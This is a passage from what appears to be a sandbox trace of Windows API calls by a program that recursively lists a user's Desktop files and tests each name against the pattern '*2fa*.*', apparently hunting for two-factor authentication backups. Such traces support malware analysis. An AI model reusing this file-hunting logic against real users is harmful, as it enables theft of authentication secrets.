(HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.847] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea658 [0110.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x38ea658, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpUsedDefaultChar=0x0) returned 49 [0110.847] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.847] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea658 | out: hHeap=0x29a0000) returned 1 [0110.847] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.847] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac18 [0110.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aac18, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.847] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.847] PathMatchSpecW (pszFile="UQEQQujqhNYM", pszSpec="*2fa*.*") returned 0 [0110.847] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0110.847] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 1 [0110.847] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.847] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.847] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.847] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.847] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.847] lstrcatW (in: lpString1="\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.847] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2=".") returned 1 [0110.848] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2="..") returned 1 [0110.848] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.848] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*" [0110.848] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743720 [0110.848] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.848] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.848] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\." [0110.848] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.848] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.848] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\.") returned="\\KTOu\\_5VgSE0-6jvrM\\." [0110.848] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.849] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.849] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.849] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.849] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.." [0110.849] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.849] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.849] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\..") returned="\\KTOu\\_5VgSE0-6jvrM\\.." [0110.849] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.849] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.849] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bd380, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0x1a731140, ftLastAccessTime.dwHighDateTime=0x1d7ad95, ftLastWriteTime.dwLowDateTime=0x1a731140, ftLastWriteTime.dwHighDateTime=0x1d7ad95, nFileSizeHigh=0x0, nFileSizeLow=0xa5ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="aQrMbJ6CFhwhf7PNnuMu.docx", cAlternateFileName="AQRMBJ~1.DOC")) returned 1 [0110.849] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.849] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.849] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.849] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.849] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.849] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.849] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04a0 [0110.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0110.849] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4c) returned 0x38eaaa8 [0110.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x38eaaa8, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", lpUsedDefaultChar=0x0) returned 76 [0110.849] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eacb8 [0110.849] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaaa8 | out: hHeap=0x29a0000) returned 1 [0110.849] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.850] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aabd0 [0110.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x29aabd0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.850] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabd0 | out: hHeap=0x29a0000) returned 1 [0110.850] PathMatchSpecW (pszFile="aQrMbJ6CFhwhf7PNnuMu.docx", pszSpec="*2fa*.*") returned 0 [0110.850] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eacb8 | out: hHeap=0x29a0000) returned 1 [0110.850] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2615710, ftCreationTime.dwHighDateTime=0x1d7aff0, ftLastAccessTime.dwLowDateTime=0xec0a4a10, ftLastAccessTime.dwHighDateTime=0x1d7aff3, ftLastWriteTime.dwLowDateTime=0xec0a4a10, ftLastWriteTime.dwHighDateTime=0x1d7aff3, nFileSizeHigh=0x0, nFileSizeLow=0x155c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ge40CUtwTNBApkxPnR.png", cAlternateFileName="GE40CU~1.PNG")) returned 1 [0110.850] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.850] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.850] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.850] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.850] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.850] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.850] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04a0 [0110.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0110.850] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x49) returned 0x38eac08 [0110.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x38eac08, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", lpUsedDefaultChar=0x0) returned 73 [0110.850] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eadc0 [0110.850] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eac08 | out: hHeap=0x29a0000) returned 1 [0110.850] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.850] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaba0 [0110.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x29aaba0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.850] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaba0 | out: hHeap=0x29a0000) returned 1 [0110.850] PathMatchSpecW (pszFile="ge40CUtwTNBApkxPnR.png", pszSpec="*2fa*.*") returned 0 [0110.850] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eadc0 | out: hHeap=0x29a0000) returned 1 [0110.850] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b17880, ftCreationTime.dwHighDateTime=0x1d7ad02, ftLastAccessTime.dwLowDateTime=0xd0a9b460, ftLastAccessTime.dwHighDateTime=0x1d7ae48, ftLastWriteTime.dwLowDateTime=0xd0a9b460, ftLastWriteTime.dwHighDateTime=0x1d7ae48, nFileSizeHigh=0x0, nFileSizeLow=0x8a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QXzQAUh0jIi.bmp", cAlternateFileName="QXZQAU~1.BMP")) returned 1 [0110.850] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.851] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.851] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0110.851] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x42) returned 0x39700d0 [0110.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x39700d0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", lpUsedDefaultChar=0x0) returned 66 [0110.851] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eabb0 [0110.851] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.851] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.851] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aab70 [0110.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x29aab70, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.851] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab70 | out: hHeap=0x29a0000) returned 1 [0110.851] PathMatchSpecW (pszFile="QXzQAUh0jIi.bmp", pszSpec="*2fa*.*") returned 0 [0110.851] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eabb0 | out: hHeap=0x29a0000) returned 1 [0110.851] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 1 [0110.851] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.851] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.851] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="YzBjdPQG.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg" [0110.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0110.851] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a2780 [0110.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x29a2780, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", lpUsedDefaultChar=0x0) returned 63 [0110.851] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2db0 [0110.851] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2780 | out: hHeap=0x29a0000) returned 1 [0110.851] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.852] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac78 [0110.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=8, lpWideCharStr=0x29aac78, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.852] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac78 | out: hHeap=0x29a0000) returned 1 [0110.852] PathMatchSpecW (pszFile="YzBjdPQG.jpg", pszSpec="*2fa*.*") returned 0 [0110.852] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2db0 | out: hHeap=0x29a0000) returned 1 